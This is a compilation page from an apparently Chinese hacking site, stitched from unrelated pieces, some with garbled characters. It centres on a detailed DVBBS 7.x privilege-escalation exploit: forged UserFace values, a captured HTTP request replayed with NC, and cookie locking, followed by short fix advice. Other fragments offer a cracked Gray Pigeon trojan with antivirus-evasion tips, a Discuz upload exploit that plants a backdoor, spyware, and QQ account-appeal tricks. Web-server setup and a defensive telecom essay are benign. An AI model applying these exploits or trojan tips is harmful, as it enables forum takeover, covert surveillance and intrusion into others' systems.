,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,Lockuser,Userclass,UserGroupID,UserGroup,
userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden,
UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday "
SQL=SQL+" From [Dv_User] Where "&SQLstr&""
set rsUser=DVBBS.Execute(SQL)
If rsUser.eof and rsUser.bof Then
ChkUserLogin=false
Exit Function
Else
iMyUserInfo=rsUser.GetString(,1, "|||", "", "")
rsUser.Close:Set rsUser = Nothing
End If
iMyUserInfo = "DVBBS|||"& Now & "|||" & Now &"|||"& DVBBS.BoardID &"|||"&
iMyUserInfo &"||||||DVBBS"
iMyUserInfo = Split(iMyUserInfo,"|||")
If trim(password)<>trim(iMyUserInfo(6)) Then
ChkUserLogin=false
ElseIf iMyUserInfo(17)=1 Then
ChkUserLogin=false
ElseIf iMyUserInfo(19)=5 Then
ChkUserLogin=false
Else
ChkUserLogin=True
Session(DVBBS.CacheName & "UserID") = iMyUserInfo
DVBBS.UserID = iMyUserInfo(4)
RegName = iMyUserInfo(5)
Article = iMyUserInfo(8)
UserLastLogin = iMyUserInfo(15)
UserClass = iMyUserInfo(18)
GroupID = iMyUserInfo(19)
TitlePic = iMyUserInfo(34)
If Article<0 Then Article=0
End If
…………后面的代码省略
可以看到,动网将用户的信息先用“|||”三个竖线连起来,做为一个字符串传给iMyUserInfo,然后iMyUserInfo由“|||”分隔成一个字符串数组。用户密码验证正确后就把数组的第20个元素的值:iMyUserInfo(19)赋给GroupID。看到没,GroupID只是数组对应的第20个元素的值,如果iMyUserInfo(19)的值为1的话,动网就以为现在登录的用户是前台管理员了。
在inc目录下的Dv_ClsMain.asp文件中也有这么验证用户身份的一段代码,用来在用户更新信息后检测用户的权限。
Dv_ClsMain.asp的650行左右
Public Sub TrueCheckUserLogin()
……前面的省略
Dim Rs,SQL
SQL="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,
UserFace,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,Lockuser,Userclass,UserGroupID,
UserGroup,userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,
UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday"
SQL=SQL+" From [Dv_User] Where UserID = " & UserID
Set Rs = Execute(SQL)
If Rs.Eof And Rs.Bof Then
Rs.Close:Set Rs = Nothing
UserID = 0
EmptyCookies
LetGuestSession()
Else
MyUserInfo=Rs.GetString(,1, "|||","","")
Rs.Close:Set Rs = Nothing
If IsArray(Session(CacheName & "UserID")) Then
MyUserInfo = "DVBBS|||"& Now & "|||" & Session(CacheName & "UserID")(2) &"|||"& BoardID &"|||"& MyUserInfo &"||||||DVBBS"
Else
MyUserInfo = "DVBBS|||"& Now & "|||" & DateAdd("s",-3600,Now()) &"|||"& BoardID &"|||"& MyUserInfo &"||||||DVBBS"
End IF
Response.Write MyUserInfo
MyUserInfo = Split(MyUserInfo,"|||")
……
End If
End Sub
'用户登录成功后,采用本函数读取用户数组并判断一些常用信息
Public Sub GetCacheUserInfo()
MyUserInfo = Session(CacheName & "UserID")
UserID = Clng(MyUserInfo(4))
MemberName = MyUserInfo(5)
Lastlogin = MyUserInfo(15)
If Not IsDate(LastLogin) Then LastLogin = Now()
UserGroupID = Cint(MyUserInfo(19))
……后面代码省略
两处检验的方式一模一样,所以我们可以利用这两个中的任意一个来达到我们的目的。看它的SQL语句部分:
SQL="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,Lockuser,Userclass,UserGroupID,UserGroup,userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday"
SQL=SQL+" From [Dv_User] Where UserID = " & UserID
UserGroupID字段排在第16个,只要我们前面的一个字段的数据中含有“|||”,那么UserGroupID在MyUserInfo这个字符串数组的位置就改变了。对这个字段选取有些特殊的要求,字段类型要合适,不能为数字型,字段的长度要可以容纳下我们构造的数组,并且还得是上面SQL语句中排在UserGroupID前面的字段,这样才能使构造的数组改变原来数组中UserGroupID的位置。如图1所示。
我们能利用的就只有UserEmail、UserFace这两个字段了。由于IsValidEmail函数的存在,我们没法在UserEmail字段中插入‘|’,所以能利用的就只有UserFace字段了。
在基本资料修改时,动网只过滤了SQL注入用的几个符号,没有过滤掉‘|’,所以只要我们构造出正确的字符串,就可以骗过动网,成为管理员组的用户了。
face=Dv_FilterJS(replace(face,"'",""))
face=Replace(face,"..","")
face=Replace(face,"\","/")
face=Replace(face,"^","")
face=Replace(face,"#","")
face=Replace(face,"%","")
漏洞的利用:
如何构造这个UserFace来达到我们的目的呢?最开始我以为只要iMyUserInfo(19)为1就可以是管理员了,但一直没有成功。其实我们在构造这个UserFace时还要考虑到一点,我们已经改变了iMyUserInfo数组的结构,我们必须保证新的iMyUserInfo数组的前面一部分的结构和原数组结构一模一样,否则就会出现类型转换错误,比如UserBirthday,在新的数组中该字段位置的值必须为一个日期。我们可以直接拿一个正常的iMyUserInfo的后半部分做我们的UserFace值,然后将UserGroupID位置改为一。我修改了login.asp文件,让它在用户登录时显示当前用户的iMyUserInfo的内容,如图2所示。
例如admin(不一定非得是admin的,其他用户的也行,只要UserGroupID处改为1就行了)登录时的iMyUserInfo的值为:
DVBBS|||2005-6-1918:05:34|||2005-6-19 18:05:34|||0|||1|||admin|||469e80d32c0559f8|||
eway@aspsky.net|||4|||1|||0|||images/userface/image1.gif|||32|||32|||2003-12-30 16:34:00|||2005-6-1918:04:06|||25|||0|||管理员|||1||||||120|||115|||28|||0||||||210.41.235.200
|||0|||0|||0||||||0||||||level10.gif||||||9pc722664t5w7IM7|||0|0|0 ||||||DVBBS
我们可以取
images/userface/image1.gif|||32|||32|||2003-12-30 16:34:00|||2005-6-19 18:04:06|||25|||0|||管理员|||1||||||120|||115|||28|||0||||||210.41.235.200|||0|||0|||0||||||0||||||level10.gif||||||9pc722664t5w7IM7|||0|0|0 ||||||DVBBS
做我们的UserFace值,要注意这个值的长度不能超过255个字符。动网限制了我们提交的字符为100个,我们可以用NC来提交。
先在本机测试一下,用普通用户登录动网,现在用户等级还是新手上路。
好了,我们去修改基本信息的地方。
提交,用WSE抓下这个包
截取到的包如下:
POST /bs/mymodify.asp?action=updat&username=4 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://210.41.235.199/bs/mymodify.asp Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)
Host: 210.41.235.199 Content-Length: 396 Connection: Keep-Alive Cache-Control: no-cache Cookie: 210%2E41%2E235%2E199%2Fbs%2F=userCookies=0&StatUserID=21048347059&password=fVIy4l887ZvD956c&userhidden=&username=test&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&userid=4; upNum=0; ASPSESSIONIDASCDABTA=IEGHDLKCCHDMOBPFPFFHMNAM
title=&sex=1&face=Images%2Fuserface%2Fimage1.gif&myface=Images%2Fuserface%2Fimage1.gif&width=32&height=32&birthday=&userphoto=&GroupName=%CE%DE%C3%C5%CE%DE%C5%C9&Signature=&showRe=0&userCookies=0&setuserinfo=1&setusertrue=0&realname=&personal=&country=&userphone=&address=&province=&selectp=0&city=&selectc=0&shengxiao=&blood=&belief=&occupation=&marital=&education=&college=&Submit=%B8%FC+%D0%C2
好,我们把userface的值给替换成
images/userface/image1.gif|||32|||32|||2003-12-30%2016:34:00|||2005-6-19%2018:04:06|||25|||0|||管理员|||1||||||120|||115|||28|||0||||||210.41.235.200|||0|||0|||0||||||0||||||level10.gif||||||
9pc722664t5w7IM7|||0|0|0 ||||||DVBBS
要注意中间的空格替换成%20,重新计算Content-Length的值,然后用NC提交一次,我们这个用户的userface就替换过来了。我们现在再重新登录看看。
哈哈,看到了吗?我们已经是管理员了。再利用黑防第六期《动网7.1漏洞惊现江湖》一文中的漏洞就可以添加后台管理员了。
动网7.1利用方法:
动网的7.1版利用这个漏洞的方法有点小变化,难度也比7.0 SP2要大。7.1版中加入了对face变量中的’|’符号的过滤
mymodify.asp文件中的270行附近:
face=Dv_FilterJS(Replace(face,"'",""))
face=Replace(face,"..","")
face=Replace(face,"\","/")
face=Replace(face,"^","")
face=Replace(face,"#","")
face=Replace(face,"%","")
face=Replace(face,"|","")
可惜的是动网的程序员百密而一疏,忘了注册时也可以修改头像,在reg.asp中就没有对face变量做任何的过滤。Reg.asp文件的285行附近。
If Request.form("face")<>"" Then
face=Request.form("face")
End If
同样,还是先抓包后用NC提交。注册登录后就是前台管理员了。但还要一个问题,就是Truepassword问题。7.1中加强了对Cookie欺骗的防范,所以这个truepassword变化的太频繁了。在7.0SP2的newpass.asp中,只有一个更新当前用户turepassword的指令:
7.0 SP2的newpass.asp文件
而在7.1中,newpass.asp还会检查用户的Cookies是否更新。7.1newpass.asp文件的30行左右
'检查写入是否成功如果成功则更新数据
If DVBBS.checkStr(Trim(Request.Cookies(DVBBS.Forum_sn)("password")))=TruePassWord Then
DVBBS.Execute("UpDate [Dv_user] Set TruePassWord='"&TruePassWord&"' where UserID="&DVBBS.UserID)
DVBBS.MemberWord = TruePassWord
Dim iUserInfo
iUserInfo = Session(DVBBS.CacheName & "UserID")
iUserInfo(35) = TruePassWord
Session(DVBBS.CacheName & "UserID") = iUserInfo
End If
在7.1中,我们的客户端的Cookies中的truepassword被更新成新的truepassword,由于服务器端的truepassword也是从MyUserInfo中得来的,而MyUserInfo中的truepassword值是不会改变的,在检测时就会形成一个死循环。我们的解决的办法是用Cookies锁定,用桂林老兵的浏览器锁定我们的Cookies,之前得将Cookies中的truepassword值设成和MyUserInfo中的truepassword值一致。这样就不会重复请求newpass.asp进入死循环了。
由于手头上没有7.1的SQL版的代码,所以上面是在7.1的Access版下测试的,可以成功的成为前台的管理员。
后记:
漏洞的防范方法:改数据库结构的工程大了点,建议在reg.asp和mymodify.asp中加入对相应变量的”|”符号进行过滤,比如:
face=Dv_FilterJS(Replace(face,"'",""))
face=Replace(face,"..","")
face=Replace(face,"\","/")
face=Replace(face,"^","")
face=Replace(face,"#","")
face=Replace(face,"%","")
face=Replace(face,"|","")
还想提一点,动网太信任后台的管理员了,所以在后台的很多地方都没有对SQL注入进行防范,这就形如给我们开了一个SQL注入之门。我们曾经检测的一个网站,设置的非常BT。上面用的就是DVBBS的论坛。当我们取得了DVBBS的后台管理员权限时才发现上传目录没有执行权限,asp木马传上去了又原样返回。而由执行asp权限的目录又没有写入的权限。网站上又没有其他的站点可以注入。后来发现DVBBS后台有注入后才总算得到一匹小马。真是千里之堤,溃于蚁穴啊。
哆嗦一句,这个权限提升漏洞没有太高深的技巧,但后果是非常严重的。由于前台管理的多个页面存在SQL注入,所以这个漏洞对DVBBS 7.x SQL版的危害非常大。请不要用本文的方法做破坏行为,否则后果自负。
ADSL+花生壳+Serv-U建个人网站
本人年岁已大,在技术上不求甚解,就依样画葫芦,经过二周努力初步组建了个人网站,供大家参考。具体如下:
一、安装Win2000服务器版,把自己需要装的软件都装好,有关网络的设置放在最后再进行比较好。
二、申请花生壳域名和安装花生壳软件。
三、设置WEB服务器
我们知道安装好WIN2000系统后,系统重启会自动出现“Windows2000 配置您的服务器”向导对话框,我们可以选择“以后配置这个服务器”把他关闭。然后设置自己的WEB服务器。
首先在D盘或其他分区建立一个如myhost之类的文件夹用于放置自己的网站。
建立站点的过程是:
依次执行“开始”--“程序”--“管理工具”--“Internet服务器管理器”,在打开的Internet信息服务窗口中,右键点击“默认WEB站点”,选择“属性”进入“默认 Web 站点属性”对话窗口。先进“主目录”项通过“浏览”键把原先建立在D:\myhost 输入“本地路径”框中;再进“文档”项通过“添加”键把index.htm、index.html和index.asp输入“启用默认文档”框内。最后确定退出。
此时打开浏览器在地址框里输入http://localhost 就能看到myhost文件夹里的网页了。
四、设置FTP服务器
启动Serv-U(我使用的汉化版),右键点击“域”--选择“新建域”--在出现的对话框里,域 IP 地址空着不填(因为我们没有静态IP地址)直接下一步--在出现的对话框里输入“花生壳”申请的域名再下一步--端口默认“21” 下一步--新建域就成了。
接下来右键点击“用户”--选择“新建用户”--在接下来出现的对话框里一一填入用户名“XXXX”、密码“****”、“用户主目录”--最后选择“锁定用户于主目录”完成。
最后选中具体的用户设置该用户权限,进入“目录访问”项,除了“执行”一项不打勾外,其余一般都可打勾;进入“配额”项,你可以制定该用户磁盘配额大小。
这样您的朋友使用CuteFTP软件,上传网站文件到您的服务器了。
URL:“花生壳”申请的域名,
NAME: XXXX,
PASSWORD: ****
(以上均为原先在Serv-U内设定的内容)
另外Serv-U 还有一项显示本机IP地址的功能,在工具栏打开“帮助”项,选中本地IP地址就能显示本机IP地址。
我申请的“花生壳”域名为shhost.vicp.net, 分别输入shhost.vicp.net/acca 或 shhost.vicp.net/host ,可以打开二个不同的网站。
[每日推荐]小白鸽QQ密码找回器黑鹰VIP专版
让死保的QQ密码保护变活保
2、先去腾讯代理的那个网络游戏:凯旋,创造个任务(记住,创建的时候要记住创建时间,还有QQ密码) 等几个月后你去申诉成功几率特别高。
再加一段网上很常见的申诉技巧:
很多人号码申诉时都如实的填写了自己相关真实的证明资料,却老是申诉被拒绝,其中很大的原因是填写资料时提供的证明资料没有足够说服力(特别是号码申诉的“其他证明资料”,我想这个问题一定困扰很多人,怎样填写一些只有你本人知道而别人无法得知的资料,这样的资料才更有说服力。),现我把我的一些申诉的具体方法和大家交流一下:
一、被盗号码QQ资料、历史密码、历史好友、用户个人身份资料、原有密码保护资料等发表的一篇“QQ号码申诉表格填写全攻略(参考 )”里有详细的说明,这些资料只要填写半年前就可以了。若原有密码保护或证件号码忘了,就直接在申诉表里注明“忘记了” 。
二、其他证明资料的填写(16个别人无法知道或很难知道的证明资料):
1、该号码何处申请(如:声讯台、网站、QQ客户端或手机申请等。如果是会员或QQ行用户顺便写上支付方式)。
2、该号码是否用手机绑定过(有的话就填上曾经绑定过的手机号码)。
3、QQ游戏(如:你是否用过QQ游戏里面的双倍积分卡等游戏道具)。
4、如果忘了原始密码,就填写个申请旧密码保护时的密码,并注明是申请旧密码保护时的密码(当然,这个要在你记得的前提下,如果不记的可以不填)。
5、是否赠送过别人QQ秀或某些腾讯的业务,有的话填上并注明获赠人的QQ号码(当然,这里最好能填3个月前的,因为盗号者可以用你密码在QQ帐户里查到你最近3个月Q币消费记录,填早的更有说服力)。 6、你的网络硬盘密码、通讯录密码、QQ帐户密码。(这些密码也很有说服力,我想若不是号码的主人,就不大可能知道这些了吧。除非你把那些密码设的和你QQ密码一样)。
7、如果你是会员,你还可以填写你QQ的客服电话的VIP服务密码。
8、该号码是否做过会员,有的话填上大体的时间。在会员服务期间是否克隆过好友,从哪个号码克隆的好友(如果有,这个也是个很好的证明)。
9、是否向哪个群或QQ游戏家族捐献过Q币(有的话,还要填写群号码或家族名称)。
10、是否获得别人赠送的QQ秀或腾讯的一些服务。
11、提供你QQ曾用过的昵称(要是号码是你的,以前的昵称总知道吧,要是不完全记的完整的昵称,至少也要提供以前昵称部分“文字”)。
12、有QQ宠物的可以填写自己宠物领取的方式(如:七夕情侣宠物蛋活动、银行卡支付、好友赠送的或曾经赠送给哪些好友宠物等)。
13、是否用QQ梦想地带的积分换过奖品或某些增值服务(有的话写清兑换的奖品送于何人或是自己使用)。
14、是否申请过蓝钻、红钻、黄钻等业务,并写上这些服务的获得方式和时间(如:QQ帐户支付、手机支付、积分兑换或好友赠送的以及服务开通的大致时间)。
15、是否上传过聊天记录(这些腾讯公司就有存档的,是十足的证明资料)。
16、如果你是会员的话,是否参加过会员活动。
遥志CMailServer 邮件服务器 v5.4.0
软件介绍
邮件服务器CMailServer是标准的互联网邮件服务器软件,支持SMTP/POP3/ESMTP等标准互联网邮件服务协议,支持互联网邮件收发,支持通用的邮件客户端软件Outlook、Foxmail等收发邮件。CMailServer还提供了完善的Web Mail网页收发邮件功能,用户可以通过浏览器申请邮箱、修改密码、接收和发送邮件。邮件发送身份验证功能可以有效的防止垃圾邮件发送者的入侵。管理员可以通过浏览器进行远程邮件帐号管理。支持邮件在线杀毒,能很好的和瑞星、诺顿等杀毒软件配合使用,轻松杀除邮件病毒。邮件服务器CMailServer还支持邮件过滤和IP过滤,有效的防止垃圾邮件
CMailServer主要功能和特点
支持Win98、Win2000、WinNT、WinXP、Win2003等操作系统。
支持通用邮件客户端软件Outlook Express、Foxmail等收发邮件。
支持Web页面收发邮件,有完善的WebMail功能。
支持Internet收发邮件,可以安全快捷往互联网发送邮件。
支持用户通过Web浏览器申请邮箱、修改邮箱密码和用户信息等资料。
支持管理员新建、删除、禁用用户邮箱和设置用户邮箱大小。
支持管理员通过浏览器远程管理帐号。
支持管理员同时向多个用户发送邮件,方便管理员发送通知。
支持生成HTML、INI、Excel和Text多种格式的用户邮箱信息报表。
支持作为NT服务运行,方便服务器管理。
支持ESMTP验证,更安全,可以有效的防止LJ邮件发送者的入侵。
支持多域名,可以将多个域名的邮件通过一台邮件服务器统一收发。
支持邮件备份,可以保存所有通过邮件服务器发送的邮件。
支持完善的日志记录,可以分析邮件服务器用户访问记录。
支持邮件组,发往邮件组邮件地址的邮件会自动分发给每个组成员。
支持邮件代理,可以接收其他互联网帐号邮件。
支持邮件杀毒,可以和瑞星、诺顿等杀毒软件结合使用,轻松杀毒。
支持邮件过滤和P过滤,操作简单易用
遥志CMailServer 邮件服务器 v5.4.0 ==>下载连接
[每日推荐]Angry IP Scanner V2.21
[每日推荐]Remote Desktop Spy V3.10
Remote Desktop Spy是一个功能强劲的计算机监视程序,它可以在家中、学校或办公室监视并记录 PC 和 Internet 活动的每一点细节。程序包括了几个内置的工具协同工作,可以在同时记录所有使用的程序、用户按键、网站访问,而且它可以每小时进行上百张的屏幕截图。可以从远程计算机中实时查看监视记录,因此您可以很轻松地远程监视孩子或雇员的活动。同时程序也提供了强大的远程控制功能,可以控制用户桌面、传输文件、启动或终止程序、加载网站、注销、重启、甚至关闭远程计算机
灰鸽子VIP专业版0930爱儿破解版
灰鸽子VIP专业版0930破解版
因为太多朋友说想要 我在把 VIP 专业版0930 的破解版在公布出来
所以本人才做了这个 送个大家
1.本破解版本为爱儿工作室破解 2004.09.30的灰鸽子 [VIP 专业版],可以自动更新服务端;
2.由于我们使用了自己的服务器进行网络验证(配置时无须输入任何用户名和密码),因而不能使用灰鸽子的专用服务器
配置服务端自动上线,在自动上线时间也不能使用注册用户专上自动上线(但这样反而
更安全一些,使用别人的服务器中转是不安全的);
3.在配置服务端自动上线时,请选中“只使用备用自动上线”,并填好UEL转向域名或网页文件;
4.在网络验证时可能有点慢,请耐心等一会;
5.生成的服务端是没有加壳的,可以方便自己加壳和更改图标,以便有效的防止杀毒软件的查杀。
爱儿工作室 http://www.lply.net
QQ:66736663
2004.12.3
[每日推荐]Discuz! 2.2F上传漏洞利用程序
Discuz! 2.2F上传漏洞利用程序==>下载连接
Discuz! 2.2F上传漏洞利用程序
参照Wascool的工具编写,实现上传一句话后门。
先注册一个名字,然后登陆!随便找一个贴子回复~
用WSockExpert抓包记下自己的COOKIE及有网站名与回复贴子的路径
,还有你所要回复的标题和内容,填到相应的选项里~~
配合附带的up.htm和wrsky.php上传更大的后门
DISCUZ2上传漏洞分析 上传漏洞变换利用
[每日推荐]雷客图ASP站长安全助手
讨厌的ActiveX插件 请你别再来烦我
小知识 什么是ActiveX插件
根据微软权威的软件开发指南MSDN的定义,ActiveX插件以前也叫做OLE控件或OCX控件,它是一些软件组件或对象,可以将其插入到网页或其他应用程序中。ActiveX插件技术是Windows上的通用软件技术,除了大家熟悉的3721网络实名外,许多软件均采用此种方式开发,例如Flash动画播放插件、Microsoft MediaPlayer插件、CNNIC通用网址插件等。
NotTroubleMe小档案
软件版本:1.2 软件大小:8KB
软件性质:免费软件 适用系统:Windows 9x/Me/NT/2000/XP
NotTroubleMe中文名叫“别烦我”,软件无需安装即可运行,操作简单,而且可随意添加欲屏蔽的ActiveX插件,实用性大大地增强了。
第一步:屏蔽ActiveX插件
运行NotTroubleMe,你会发现列表框中显示了能够进行屏蔽的ActiveX插件,勾选欲屏蔽的ActiveX插件(如图2),单击“确定”按钮,然后执行注销操作,再次进入系统后,修改便开始生效了。
第二步:添加ActiveX插件黑名单
由于NotTroubleMe是通过禁止调用相应的ActiveX插件来实现对3721、CNNIC、Baidu等ActiveX插件封锁的,而每个ActiveX插件都有“CLSID”,只要找到了欲屏蔽的ActiveX插件的CLSID,问题迎刃而解。当访问“3721中文邮”首页时,会弹出3721中文邮的ActiveX插件安装窗口,我们单击“否”按钮关闭。此时单击IE浏览器菜单“查看→源文件”,在弹出的文本窗口中查找关键字“clsid”。我们将会看到“clsid”后面紧跟了类似“4EDBBAEA-F509-49F6-94D1-ECEC4BE5B686”的字符串,该字符串就是“3721中文邮”ActiveX插件的CLSID(如图3)。我们将它复制下来,接着切换到“NotTroubleMe”窗口,单击“新建”按钮,在“名字”框中为该ActiveX插件取个名称,然后将复制来的CLSID粘贴到“CLSID”框中,单击“确定”按钮保存即可。根据上述方法,你可以添加更多的ActiveX插件到“NotTroubleMe”里。
防范黑客攻击策略详细分析
1 引言
电信网从原来电话交换为主的话音业务正全面向语音、数据、多媒体等综合业务的平台转变。IP技术成为下一代电信网络的关键技术,传统电信网由于其自身的封闭性,安全问题并不是很突出,但是以IP为基础协议的下一代网络已经开始必须面对以往只是在IP网上才会出现的网络安全问题。在威胁我国电信IP网的众多因素中,黑客攻击是其中最为重要的一种,在我国电信IP网中曾出现过遭黑客攻击的案例,如近日某企业员工通过参与某移动公司项目得到了系统的密码,继而侵入移动公司充值中心数据库,盗取充值卡密码,给移动公司带来了370余万元的损失。
近年来,黑客对电信网络的攻击给社会带来了极大的损害,随着黑客攻击技术的不断发展,网络和系统漏洞的不断出现,黑客群体的变化,社会对网络的依赖性提高,未来黑客攻击手段越来越隐蔽,破坏力将越来越大,攻击行为也将变得越来越复杂和难于防范。2006年世界电信日的主题是:让世界网络更安全。我国信息产业部也根据这个主题开展了一系列的主题活动,从而可以看出网络安全已经成为电信发展中的一个重要问题。本文就黑客攻击的手段和防范的策略给出简单的分析。
2 黑客攻击对电信IP网的安全威胁分析
在《中华人民共和国电信条例》中,对电信网络安全方面,针对现实中危害较大的计算机病毒、黑客等情况,做了禁止性的规定。其中在第五十八条规定了任何组织或者个人不得有四类危害电信网络安全和信息安全的行为,其中第三类中就是故意制作、复制、传播计算机病毒或者以其他方式攻击他人电信网络等电信设施。这个其他行为目前主要是指黑客攻击。黑客通过遍及全球的IP网侵入通信系统,截取通信安全方面的信息资料,他们篡改信息、替换网页、下载或盗取敏感信息、攻击主机和网络、发送邮件炸弹或使网络瘫痪。黑客攻击一旦得逞,小则瘫痪网络的某项服务,大则造成短时间内无法恢复的整个网络的瘫痪,造成巨大的损失。黑客之所以能够对电信IP网造成威胁,主要有以下几点原因:
(1)技术方面:IP协议设计中的错误和疏忽使得网络先天不足,为黑客攻击提供了条件。例如,IEEE802.11b 中出现的WEP漏洞,还有由于TCP/IP协议缺乏相应的安全机制,且IP网最初设计基本没有考虑安全问题等等都使得电信网络存在先天不足。随着软件系统规模的不断增大,各种系统软件、应用软件变得越来越复杂,电信设备厂商、集成商和运营商的软件中心在开发和实现过程中不可避免的会出现各种缺陷和漏洞,这使得黑客可以利用这些漏洞对电信IP网进行攻击。
(2)管理方面:缺乏完整统一的安全策略,缺乏完善的、切实可行的管理和技术规范,为黑客“钻空子”提供了便利。很多网络在建设初期,发展的方向都倾向于网络的便利性和实用性,忽略了至关重要的网络安全性,为以后的发展埋下了隐患。有些地方缺乏合理安全的网络设计规划和配置,防火墙的配置也不够严密,这些都为黑客攻击提供了方便。
(3)人力方面:缺少网络安全方面的专职人员,并且各运维人员安全意识、安全水平上也存在着很大的差别,有些黑客居然可以冒充管理人员通过打电话而问到网络的密码,这些都成为黑客攻击电信IP网的手段,所以提高运维人员的安全水平和安全意识对各个运营商来说是刻不容缓的事情。
3 黑客攻击电信IP网手段和防范措施
黑客攻击手段按照结果分可分为二类:本地攻击和远程攻击;按照侵入的深度可大致分为:表层攻击、读访问、非根式的写与执行访问、根式的写和执行访问;按照系统遭受攻击的程度又可分为六个层次:第一层是邮件炸弹攻击和服务拒绝攻击、第二层是本地用户获得非授权读访问、第三层为本地用户获得非授权文件的写权限、第四层是远程用户获得非授权的帐号和远程用户获得文件的读权限、第五层是远程用户获得特许文件的写权限、第六层是远程用户获得根权限。几种分类的关系如图1所示。
图1 黑客攻击电信IP网手段的几种分类的关系
常见的黑客攻击电信IP网的手段主要有:口令破解等解码类攻击、恶意代码攻击、后门程序的攻击、拒绝服务类攻击、邮件炸弹、邮件列表类炸弹攻击、通过 IP包进行攻击、通过操作系统漏洞对电信网进行攻击、缓冲区溢出和远程缓冲区溢出攻击、网络服务漏洞攻击等等。这里对几种常见黑客攻击手段进行分析。
3.1 口令破解等解码类攻击
口令攻击是黑客最常用的攻击方法之一。黑客通过口令破解软件破解服务器账号口令,由于管理员事安全意识不强,使得该方法简单而且行之有效。对于口令破解的攻击,在设置口令时应注意不要使用过于简单的密码;不要在不同的账号里使用相同的密码;应保守密码口令并经常有规律的更换;每隔一段时间要把所有的密码都更换一次;及时的取消调离或者停止工作职员的账号以及无用的密码;在验证过程中,口令不能以明文方式传输,也不能以明文方式存放在系统中。
3.2 恶意代码和后门程序的攻击
恶意代码包括病毒、蠕虫、特洛伊木马等,后门程序是系统调试后预留的或黑客攻击系统之后为方便再次进入而开启的守候进程或隐蔽通道,是攻击者绕过安全性控制而获取对程序或系统访问权的方法。对于特洛伊木马这种黑客程序,可以采用专门的查找软件,检测和清除系统中隐藏的木马程序。
3.3 拒绝服务类攻击
该类型攻击是目前电信网中最常遭受的攻击之一,就是让服务器的CPU过载、磁盘饱和、内存不足等等,包括拒绝服务攻击和分布式拒绝服务。攻击目的有两种:占用大量的带宽和攻击脆弱服务器。前者的攻击手段有:SYN Flood攻击、Ping Flood攻击、Land攻击、WinNuke攻击等,甚至利用路由协议的漏洞制造网络风暴等,通过短时间内向目标系统发送大量的数据包而导致网络流量堵塞,从而达到阻止目标主机大部分服务的功能。对Land攻击和WinNuke攻击,适当配置防火墙设备或过滤路由器的过滤规则就可以防止这种攻击行为(一般是丢弃该数据包),并对这种攻击进行审计。对Ping Of Death攻击和Teardrop攻击,要添加系统补丁程序,丢弃收到的病态分片数据包并对这种攻击进行审计。对于某些较复杂的入侵攻击行为(如分布式攻击、组合攻击)不但需要采用模式匹配的方法,还需要利用状态转移、网络拓扑结构等方法来进行入侵检测。
3.4 通过操作系统漏洞对电信网进行攻击
现在电信网中主机设备大部分使用UNIX系统,这也使得黑客可以通过机器操作系统的一些漏洞对电信网进行攻击。包括操作系统本身的体系结构的不安全、进程管理机制中的缺陷,还有操作系统提供的远程调用服务和特意安排的系统漏洞也是不安全因素之一。黑客通过黑客软件针对操作系统的薄弱环节,对网络设备进行非正常或越权使用,使系统的安全机制收到威胁,或者利用各种假冒和欺骗的手段,如IP地址欺骗等,非法获得合法用户的使用权,致使操作系统对资源分级分权管理的失效。对于操作系统出现漏洞,系统需要及时添加补丁程序和进行安全性能优化配置工作。
3.5 缓冲区溢出和远程缓冲区溢出
是一种系统攻击的手段,通过往程序的缓冲区写超出其长度的内容,造成缓冲区溢出,黑客可以获得其他用户或组的非授权读、写的访问。缓冲区溢出攻击占了远程网络攻击的绝大多数。目前有四种基本的方法保护缓冲区免受缓冲区溢出的攻击和影响。首先,要编写正确的代码;其次,数组边界检查能防止所有的缓冲区溢出的产生和攻击;再次,要对程序指针进行完整性的检查;最后,通过操作系统使被攻击程序的数据地址空间不执行,从而使得攻击者不能执行被植入被攻击程序输入缓冲区的代码。
4 电信IP网防范黑客攻击的安全体系
网络安全威胁和防范一直是电信运营商十分关注的问题。要做好电信IP网防范黑客攻击的安全防护,需要从人力、技术、管理、和安全立法几方面采取措施,以建立有效的安全防护体系。
有效的防范黑客攻击安全体系的实现需要三方面的努力:
(1)技术上:黑客攻击的多样性决定了防范技术也必须采取多层次、全方位的防御体系。包括先进的、不断更新和完善的安全工具、各种软硬件设备、管理平台和监控系统。主要包括防火墙、安全扫描、评估分析、入侵检测、入侵取证、陷阱网络、备份恢复和病毒防治等。
(2)管理上:黑客攻击的技术手段越来越高明,但是不可否认,有些黑客攻击之所以可以成功在于网络管理上的疏忽和漏洞。所以要建立有效的防范黑客攻击的安全体系需要严密完善的安全技术规范、管理制度、高水平的安全技术人才和高度的工作责任心。其中包括建立定期检查制度、建立包机或网络安全专人负责制、建立安全事故及时上报制度、建立定期备份制度、建立口令定期修改制度等等。
(3)规划上:网络技术迅猛发展,也使得黑客攻击技术不断发展,网络管理者要做好防范工作的同时也要做出正确合理的网络结构设计、规划和组织,做到防范于未然。对新的技术和产品的研发要早作准备,深入调研国内外电信IP网安全的状况,了解黑客技术的进展,在广泛融合的基础上做出前瞻性的规划,培养相关领域的人才。
5 结束语
电信网是公网,是国家关键基础设施的重要组成部分,对可靠性和安全性要求极高,是人们向信息社会迈进的基石,与人们的工作、生活息息相关,因此无论政府、运营商还是用户,都应酶嗟毓匦牡缧磐绲陌踩侍狻V挥辛私饬说缧臝P网安全的现状、熟悉黑客攻击的基本手段、建立安全有效的防范体系,电信网才能成为高效率、可靠、可信赖的通信平台。
启用过时资源记录自动清理
